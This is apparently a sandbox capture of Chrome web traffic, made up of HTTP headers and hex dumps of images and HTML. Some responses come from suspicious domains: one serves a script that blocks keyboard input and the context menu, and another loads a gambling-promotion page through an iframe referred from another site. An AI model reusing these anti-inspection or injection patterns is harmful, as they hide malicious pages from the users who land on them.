                                          Content-Length: 705
                                          Content-Type: image/gif
                                          Date: Sun, 12 Jan 2025 00:17:01 GMT
                                          Etag: "2c1-4a6473f6030c0"
                                          Expires: Wed, 10 Jan 2035 00:17:01 GMT
                                          Last-Modified: Wed, 22 Jun 2011 06:40:43 GMT
                                          P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                          Server: Apache
                                          Set-Cookie: BAIDUID=78B6FD140352973CA429EABACA66037D:FG=1; expires=Mon, 12-Jan-26 00:17:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                          Set-Cookie: BAIDUID_BFESS=78B6FD140352973CA429EABACA66037D:FG=1; Path=/; Domain=baidu.com; Expires=Mon, 12 Jan 2026 00:17:01 GMT; Max-Age=31536000; Secure; SameSite=None
                                          Connection: close
                                          2025-01-12 00:17:01 UTC509INData Raw: 47 49 46 38 39 61 75 00 26 00 a2 00 00 e6 32 2f ea d4 e2 59 60 e8 99 9d f1 ef 76 74 29 32 e1 e1 06 02 ff ff ff 21 f9 04 00 00 00 00 00 2c 00 00 00 00 75 00 26 00 00 03 ff 78 ba dc fe 30 b6 20 4a 19 30 04 c9 bb ff 60 c8 55 56 21 4c a4 b0 89 6c eb be cb 50 96 eb 11 cc 56 0d ef 7c 7f e0 96 93 82 34 c3 f8 8e 48 d0 0d 28 94 01 0b c9 a8 f4 b1 04 0e 9f 05 dd 74 7b ac e2 14 d8 2c 77 8c 7c 0a b1 42 b2 5a a4 61 10 4b c6 37 7c 4d f7 50 68 0a af 25 f6 d4 d6 ff 6e 38 46 4e 26 3a 40 46 80 89 7c 56 31 7e 77 85 79 03 92 8a 7f 72 16 88 20 84 39 94 6b 68 6c 4f 9c 6a 9e 21 9a 73 a1 5c a3 0c 1a 6d 0e 96 26 a7 5c ae 98 8f 41 5a ae 50 51 04 ba 7e 7f a5 9b 79 58 98 b7 52 06 c5 bc c5 c8 c9 06 00 00 04 bc 1f 00 c8 57 45 0b 7a 38 35 ae 27 ca db dc 06 0a d1 dd e1 e0 e1 c8 04 2e e3
                                          Data Ascii: GIF89au&2/Y`vt)2!,u&x0 J0`UV!LlPV|4H(t{,w|BZaK7|MPh%n8FN&:@F|V1~wyr 9khlOj!s\m&\AZPQ~yXRWEz85'.
                                          2025-01-12 00:17:01 UTC196INData Raw: fa b9 a3 c3 70 8f 21 08 06 69 e3 f9 36 e1 e9 66 b4 e6 9c 19 79 5c 3c 0b 98 7b f5 66 9d 5b 74 9d c8 a8 4f 27 98 53 e8 9b 41 15 8e 1f 20 91 5c 4c f8 d0 10 f2 8a f6 16 60 1c d0 00 86 d3 6d e0 54 35 32 19 44 5d 50 94 d9 55 8a 61 9d 7d f7 cb 48 f8 3d a0 9f 7e bd 55 78 1f 6d ec 99 64 a0 16 aa d9 65 cd 00 5a 24 d6 00 23 17 72 30 21 7e 00 2a 83 1a 57 2b 00 d7 0d 76 d9 b1 23 e3 55 cb 61 e8 d3 6d 66 3d e7 cc 2a 4c d5 d0 df 3c 30 02 33 e3 90 f6 5d 88 d4 78 8f 95 f3 5c 79 e9 ed 32 81 8b ca 04 29 e4 4a b7 68 a7 d8 69 48 0e 74 12 01 f5 1c 98 48 4b 26 bc 04 a2 16 01 b4 44 c4 4b 10 ad 91 00 00 3b
                                          Data Ascii: p!i6fy\<{f[tO'SA \L`mT52D]PUa}H=~UxmdeZ$#r0!~*W+v#Uamf=*L<03]x\y2)JhiHtHK&DK;


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          38192.168.2.449789122.10.26.2024435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:01 UTC353OUTGET /wdzmr.php HTTP/1.1
                                          Host: vkg.hpdbfezgrqwn.vip
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:01 UTC339INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:01 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Request-ID: 976cb5d596e1f60e0001b4db44c60baf
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Headers: *
                                          Strict-Transport-Security: max-age=31536000
                                          2025-01-12 00:17:01 UTC620INData Raw: 32 36 30 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 56 5f 50 41 54 48 3d 22 2f 22 3b 77 69 6e 64 6f 77 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 20 72 65 74 75 72 6e 20 74 72 75 65 3b 20 7d 3b 64 6f 63 75 6d 65 6e 74 2e 6f 6e 6b 65 79 64 6f 77 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 6f 6e 6b 65 79 75 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 6f 6e 6b 65 79 70 72 65 73 73 20 3d 20 6e 65 77 20 46 75 6e 63 74 69 6f 6e 28 22 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 29 3b 64 6f 63 75 6d 65 6e 74 2e 6f 6e 63 6f 6e 74 65 78 74 6d 65 6e 75 20 3d 20 6e 65 77 20 46 75 6e 63 74 69 6f 6e 28 22 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69
                                          Data Ascii: 260<html><head><script>var V_PATH="/";window.onerror=function(){ return true; };document.onkeydown = document.onkeyup = document.onkeypress = new Function("return false;");document.oncontextmenu = new Function("return false;");</script><meta name="vi


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          39192.168.2.44978843.153.236.1474435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:01 UTC374OUTGET /web/index/images/logo_440x140.v.4.png HTTP/1.1
                                          Host: www.sogou.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:01 UTC905INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:01 GMT
                                          Content-Type: image/png
                                          Content-Length: 2950
                                          Connection: close
                                          Last-Modified: Mon, 19 Aug 2024 09:14:31 GMT
                                          Set-Cookie: ABTEST=0|1736641021|v17; expires=Tue, 11-Feb-25 00:17:01 GMT; path=/
                                          P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                          Set-Cookie: IPLOC=US; expires=Mon, 12-Jan-26 00:17:01 GMT; domain=.sogou.com; path=/
                                          P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                          Set-Cookie: SUID=BD7B2E085EA7A20B00000000678309FD; expires=Sat, 07-Jan-2045 00:17:01 GMT; domain=.sogou.com; path=/
                                          P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                          ETag: "66c30cf7-b86"
                                          Expires: Fri, 11 Jul 2025 00:17:01 GMT
                                          Cache-Control: max-age=15552000
                                          UUID: 9385f5d6-2b2c-4b2c-8549-2915d7301371
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:01 UTC2950INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b8 00 00 00 8c 08 03 00 00 00 39 88 4c 8e 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 7b 50 4c 54 45 47 70 4c 53 56 59 53 56 59 53 56 59 53 56 59 53 56 59 ff 75 1b 53 56 59 b3 63 38 53 56 59 ff 73 1a 53 56 59 53 56 59 53 56 59 53 56 59 53 56 59 53 56 59 ff 77 1d ff 70 18 ff 72 19 ff 7f 22 ff 84 26 ff 65 0f ff 66 10 53 56 59 ff 62 0d ff 62 0d ff 6c 14 ff 87 28 ff 84 26 53 56 59 fe 69 12 ff 6f 17 ff 8d 2d ff 7c 20 ff 76 1b ff 81 24 fe 63 0d fe 56 04 ff 86 27 fe 5d 09 f6 58 00 3f 00 00 00 1e 74 52 4e 53 00 12 4c 96 f7 c2 15 ef 08 3c 5d 7e ad 66 d3 2a e2 71 49 30 e5 90 8a a4 1c d1 e8 bd d4 b3 ad 02 03 e5 00 00 0a 7f 49 44 41 54 78 da ed 9d e9 7a a2 4a
                                          Data Ascii: PNGIHDR9LgAMAasRGB{PLTEGpLSVYSVYSVYSVYSVYuSVYc8SVYsSVYSVYSVYSVYSVYSVYwpr"&efSVYbbl(&SVYio-| v$cV']X?tRNSL<]~f*qI0IDATxzJ


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          40192.168.2.449790122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:01 UTC679OUTGET / HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          sec-ch-ua-platform: "Windows"
                                          Upgrade-Insecure-Requests: 1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: navigate
                                          Sec-Fetch-Dest: iframe
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:02 UTC297INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:01 GMT
                                          Content-Type: text/html
                                          Content-Length: 59450
                                          Last-Modified: Sat, 11 Jan 2025 18:37:47 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6782ba7b-e83a"
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:02 UTC16087INData Raw: 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 09 3c 74 69 74 6c 65 20 69 64 3d 22 74 69 74 6c 65 6e 61 6d 65 22 3e e6 ac a2 e8 bf 8e e5 85 89 e4 b8 b4 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74
                                          Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no"><title id="titlename"></title><met
                                          2025-01-12 00:17:02 UTC16384INData Raw: 20 20 20 20 3c 68 36 3e 3c 73 74 72 6f 6e 67 3e e2 91 a1 20 e7 83 ad e9 97 a8 e4 bc 98 e6 83 a0 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 36 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e e2 9e a4 20 e5 85 85 55 53 44 54 ef bc 8c e5 a4 9a e5 85 85 e5 a4 9a e9 80 81 ef bc 8c e6 9c 80 e9 ab 98 e9 80 81 e4 bd a0 38 38 38 38 e5 85 83 e7 a4 bc e5 8c 85 e3 80 82 e6 af 8f e5 a4 a9 e5 85 85 e7 9a 84 e8 af 9d ef bc 8c e8 bf 98 e6 9c 89 e9 a2 9d e5 a4 96 e5 bd a9 e9 87 91 e7 ad 89 e7 9d 80 e4 bd a0 e3 80 82 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e e2 9e a4 20 e6 96 b0 e7 94 a8 e6 88 b7 e6 b3 a8 e5 86 8c ef bc 8c e7 9b b4 e6 8e a5 e4 b8 8b e6 b3 a8 ef bc 8c e8 83 bd e6 8b bf e6 9c 80 e5 a4 9a 36 36 36 36 e5 85 83 e5 a4 a7 e7
                                          Data Ascii: <h6><strong> </strong></h6> <p> USDT8888</p> <p> 6666
                                          2025-01-12 00:17:02 UTC16384INData Raw: 6c 61 62 65 6c 6c 65 64 62 79 3d 22 79 6f 6e 67 4c 69 4d 6f 64 61 6c 4c 61 62 65 6c 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 61 6c 2d 64 69 61 6c 6f 67 20 6d 6f 64 61 6c 2d 6c 67 22 20 72 6f 6c 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 20 79 6f 6e 67 6c 69 62 67 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 61 6c 2d 68 65 61 64 65 72 20 64 2d 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 3c 68 34 20 63 6c 61 73 73 3d 22 6d 6f 64 61 6c 2d 74 69 74 6c 65 22 20
                                          Data Ascii: labelledby="yongLiModalLabel" aria-hidden="true"> <div class="modal-dialog modal-lg" role="document"> <div class="modal-content yonglibg"><div class="modal-header d-flex justify-content-center align-items-center"> <h4 class="modal-title"
                                          2025-01-12 00:17:02 UTC10595INData Raw: 69 6f 6e 2d 62 74 6e 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 6d 6f 64 61 6c 22 20 64 61 74 61 2d 74 61 72 67 65 74 3d 22 23 79 69 6e 48 65 4d 6f 64 61 6c 22 20 64 61 74 61 2d 76 2d 35 33 37 31 61 30 36 36 3d 22 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 74 6e 22 20 64 61 74 61 2d 76 2d 35 33 37 31 61 30 36 36 3d 22 22 20 73 74 79 6c 65 3d 22 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 20 79 69 6e 68 65 22 20 64 61 74 61 2d 76 2d 35 33 37 31 61 30 36 36 3d 22 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 64 61 74 61 2d 76 2d 35 33 37 31 61 30 36 36 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                          Data Ascii: ion-btn" data-toggle="modal" data-target="#yinHeModal" data-v-5371a066=""> <div class="btn" data-v-5371a066="" style="cursor: pointer;"> <div class="img yinhe" data-v-5371a066=""></div> <div data-v-5371a066=""> <div class="


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          41192.168.2.449791154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:01 UTC612OUTGET /images/21/11/25/1p6vg4xelj/banner-4.jpg HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:02 UTC304INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:02 GMT
                                          Content-Type: image/jpeg
                                          Content-Length: 357315
                                          Last-Modified: Fri, 10 Jan 2025 07:04:24 GMT
                                          Connection: close
                                          ETag: "6780c678-573c3"
                                          Expires: Tue, 11 Feb 2025 00:17:02 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:02 UTC16080INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 02 02 02 02 02 02 02 02 02 02 02 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff db 00 43 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 01 78 04 b0 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 00 02 02 03 01 01 01 01 00 00 00 00 00 00 00 00 06 07 05 08 03 04 09 02 01 00 0a ff c4 00 4f 10 00 01 04 01 02 04 04 05 01 06 03 06 03 06 01 0d 02 01 03 04 05 06 11 12 00 07 13 21 14 22 31 41 08 15 23 32 51 61 16 24 33
                                          Data Ascii: JFIFHHCCxO!"1A#2Qa$3
                                          2025-01-12 00:17:02 UTC16384INData Raw: 15 4d 38 e5 eb 3f 59 7b c4 c2 e7 6f 7c b2 df 32 ae 2a 2a a3 0c 11 b6 d6 e9 9d 97 3c 73 2e 6a 56 d6 dc d6 cf 85 8e d8 49 6c 23 47 c6 ee e9 72 08 8e d3 34 ed 2a 56 93 2b 24 9c 73 73 a9 2c cc 15 e6 dc 0d 76 1f 4d b1 53 ef a9 29 f8 5b 1c f2 5e 04 60 e7 91 b9 0e 04 67 98 f9 59 73 ef 71 0d c6 6f 7f 92 8f e5 e7 2a 64 e5 1c ca 67 3c bd 98 56 d8 7c 91 76 bf 22 a0 ac 61 96 ae 21 4a 08 7f bb 37 63 1e 7a 30 1d 17 09 40 ba 8c 29 a1 a2 6d 03 53 45 e3 2a b8 cc 14 90 18 ae 03 88 24 13 9b 4e 79 dc 8d d2 e5 9d a4 97 39 a9 38 1c 8f 77 0a 8d 2e 1e 7b 7c f6 0b 99 cf 8a f5 86 1f cb a8 d2 35 9a ea 39 19 06 2d f2 8c 37 9c 3a c6 16 43 7a 92 9a a2 10 8a 21 2a 2a ae 8c c9 c5 df 33 63 fd 34 4d 91 8e 23 13 b1 0c 2c 07 3f fc 8d b6 40 30 06 6b b2 ea 47 c1 b6 1e 19 ad 39 f3 22 6d 46 39
                                          Data Ascii: M8?Y{o|2**<s.jVIl#Gr4*V+$ss,vMS)[^`gYsqo*dg<V|v"a!J7cz0@)mSE*$Ny98w.{|59-7:Cz!**3c4M#,?@0kG9"mF9
                                          2025-01-12 00:17:02 UTC16384INData Raw: 71 fe 7b f2 ea be f7 ce e2 44 bf 8f 69 5f 1f a8 89 f4 d1 65 ac 6e 98 f7 ec aa 9a e9 eb fa 71 b6 d1 13 91 70 08 52 f1 47 dc 91 19 23 c4 7c c5 ee 92 f9 97 c3 bf c4 3f 32 27 b7 fb 2b 9f 72 3b 38 c7 df 89 30 26 d0 e1 f9 94 42 57 ca 4d 7a 32 28 e3 72 55 a3 7b 6c 85 22 4d e5 e9 a7 64 5e 2d 21 a5 63 07 77 33 cf cd 72 bc 46 ae ae a3 de bb 5b ca c4 0f e7 cd 26 87 e1 33 e2 8b 07 ab ab 62 e3 92 99 d4 d9 30 e6 24 7a f7 60 46 6e d5 23 b4 d3 23 d1 7f 4a f9 0e f9 5b 73 cc 9a 7d ca 9a 7b af 13 92 37 76 97 03 6f 41 50 88 5e 06 44 2b b5 85 7c 17 a3 43 27 32 f8 a4 ba ad c0 a0 4a 79 d7 28 70 1c 74 c0 ef a6 34 4b ae f9 ae b6 86 02 67 e6 d5 47 71 26 ba 2b 83 a2 22 21 fa 71 13 6f 2b b0 8e 5b df 54 f5 35 1c 95 0f b4 6d c5 f4 1e 6a c3 33 cc 9a bc 2e 90 b0 ce 47 e1 d0 39 65 8c 17
                                          Data Ascii: q{Di_enqpRG#|?2'+r;80&BWMz2(rU{l"Md^-!cw3rF[&3b0$z`Fn##J[s}{7voAP^D+|C'2Jy(pt4KgGq&+"!qo+[T5mj3.G9e
                                          2025-01-12 00:17:02 UTC16384INData Raw: d2 d9 27 a2 98 4c e7 0b e5 b5 f6 f2 43 15 75 51 15 ee 60 66 5f 2e 83 1f 1b c2 da 48 39 1b 32 9d 9d 33 a8 76 26 f4 69 30 21 bd 09 1a 61 86 e5 79 ba 44 fa ab 42 5a 8a fd c8 bc 1e 2e c0 3c b8 3f 11 6f 4b 01 cb f1 d5 6e 06 c0 d7 62 6b af cf 90 fc 28 0a 18 af e3 f6 d5 83 63 6b 5d 8d b9 66 92 a9 9a 94 e6 f6 5b 90 d4 df 1c b5 6a 65 b7 d5 c3 91 1f a4 9b 53 45 5d ab a2 8e bc 5c c9 30 7b 31 37 31 ae 5c b7 56 61 e0 37 25 eb 37 6d 69 1c a4 a4 b1 9e fe 07 43 40 c5 73 b2 9f 37 9a 5f 0a f2 3a 8b e1 9f 90 eb ee 2e f9 0e 2e c6 fa 8a a6 0a 3d 42 4d 35 5e 10 a1 9e 19 c1 7b 5b 67 67 ff 00 77 44 16 bd ae 17 c3 9f cd 4c 43 c2 f3 1c 98 65 2b f2 28 aa 12 f2 4b 70 d2 25 ab ee b1 57 49 16 3c 71 93 5d 05 e6 d9 71 a5 20 02 6f ad e2 c9 77 a6 82 bd 94 d0 78 4a ab b1 7c 8d 90 0f fb ad
                                          Data Ascii: 'LCuQ`f_.H923v&i0!ayDBZ.<?oKnbk(ck]f[jeSE]\0{171\Va7%7miC@s7_:..=BM5^{[ggwDLCe+(Kp%WI<q]q owxJ|
                                          2025-01-12 00:17:02 UTC16384INData Raw: 1c 46 9a 27 b2 67 77 d2 f5 6f 8d e0 59 a8 fb 99 35 59 97 30 b9 5b 9f f2 eb 1e e5 f5 73 35 76 d4 72 da 60 5a 82 ea 10 b8 8d ab 8d 92 3b 28 b5 42 52 04 d1 7d 78 7d 8c 8c 1b b9 d9 a4 c5 f4 b6 4b 86 b4 16 9f 2b 98 f6 fd ca 56 11 3c 3b ad a2 2a aa b8 2a 87 b7 fb 28 ae bc 72 b5 30 e2 36 1b 2e fb 83 57 36 07 78 85 6f fe 13 33 6c 5f 22 cf 2c f1 0b db 2b 0a c6 ed 69 df 2a 67 a2 c7 17 c8 e4 c7 24 78 9a 22 22 04 44 50 dc 49 aa f0 c7 0e 8a 4a 69 81 1a 1d 50 bd a5 aa 6d 54 20 72 2a e8 db e3 d4 8d ba a1 5d 6e 37 0d 0a 7e f0 fa c4 75 a5 6d 7f cc 6b bc 17 fa 89 69 c7 5c c9 09 d7 25 e7 6e 6e 7c d0 7d ad 1b 90 fa 4b 22 30 f4 5f 45 e8 ba ca 8b 8d 9f e8 84 3d bb 7b f0 48 cd f4 59 27 77 50 82 e5 d7 c5 03 43 69 b5 8a e3 7f 6b fb d5 b2 15 f6 51 24 51 d3 82 11 75 16 be c5 6c 47
                                          Data Ascii: F'gwoY5Y0[s5vr`Z;(BR}x}K+V<;**(r06.W6xo3l_",+i*g$x""DPIJiPmT r*]n7~umki\%nn|}K"0_E={HY'wPCikQ$QulG
                                          2025-01-12 00:17:02 UTC16384INData Raw: d5 92 8e 57 4a 1c eb 97 3b 99 d7 c4 72 49 49 0b ee 5e 75 d0 6f 7f 14 9a bc b5 c4 6f 5a 15 af b2 b8 b7 92 90 dd 6e 2c 87 19 87 55 e0 dd 32 d5 16 44 a2 14 17 d9 6d 15 43 a1 a8 6c ed a6 ee 3a 2a 4a 49 a1 6d 8b 5a df a7 c1 74 bc 33 8f d4 50 58 c7 1b 59 cf f7 07 79 6d 7e 8b 51 db aa 97 57 02 af a5 cd 32 09 a7 7d 22 15 3e 59 19 98 61 05 da ed c2 2c 14 88 52 98 24 66 4b 62 06 a2 04 e0 21 af da e2 ae 88 bc 35 23 09 bb 8b 6f 61 71 d4 85 5d 3c 9d bc 8e 99 c0 67 73 6b 6e ac 3e 2d 19 8a 4c 9e 65 3c d8 ad 64 f2 b1 f8 d6 70 31 c7 00 de 81 16 7d 9c 51 27 23 3f 3e 3c a6 c1 4f 71 0a bb d3 d7 54 d3 cc e3 61 eb c7 43 2b aa 9a 5e de e6 2d 46 44 b7 c0 8b ae 76 99 b7 92 ec cf a7 24 15 c9 6c 5e 35 fb 75 56 79 a5 bd 9c 6a 9b e9 96 59 20 d9 45 8e eb d6 c4 80 ae 46 8b 0d ad 84 2e
                                          Data Ascii: WJ;rII^uooZn,U2DmCl:*JImZt3PXYym~QW2}">Ya,R$fKb!5#oaq]<gskn>-Le<dp1}Q'#?><OqTaC+^-FDv$l^5uVyjY EF.
                                          2025-01-12 00:17:02 UTC16384INData Raw: 5d 1a 82 a1 93 3d e2 42 70 83 95 c6 1b 5c 5a db 5f 9f 9e a8 91 54 34 5c 6e 42 53 fc 70 5c 72 da a2 ce 35 77 25 2a 60 b3 1e 95 98 2d 65 f5 b8 fb 62 d5 03 36 8e b9 b2 b1 a9 8f b0 4b 15 c9 4d 91 b9 b3 6f 64 f6 52 54 5d a4 31 b4 cb dd d3 e5 7f ca 97 e9 bf a7 8c eb f3 ff 00 0a 23 91 77 5c b8 0e 5c da a6 49 9d 67 16 b8 85 e8 38 f4 9f 87 ba 1a 78 f7 36 b6 ce 57 bb b2 64 d7 0d c8 ee a3 12 55 d3 fa eb 08 44 48 c0 55 1d df c1 a4 c3 a6 be b7 3b 25 9a 5d 7d 57 34 6e b2 66 df 1c ba 9a 8a bd ba 4a 2b 9c ad fb b8 50 3a 48 92 1a 67 42 65 88 c6 64 84 68 2d 87 6d bb b4 dc 9d d3 54 d7 8b 2e 1f 07 69 84 bb 65 4b c6 a5 c1 93 74 59 2c f3 cc d1 ec 77 f6 7a 45 cc 87 aa ba 88 e2 45 40 14 33 71 7b 22 ef 14 42 55 f6 ff 00 a7 1d 0c 90 8b 66 b9 a8 66 24 d9 4d db dc 2d 08 c8 c7 ca 64
                                          Data Ascii: ]=Bp\Z_T4\nBSp\r5w%*`-eb6KModRT]1#w\\Ig8x6WdUDHU;%]}W4nfJ+P:HgBedh-mT.ieKtY,wzEE@3q{"BUff$M-d
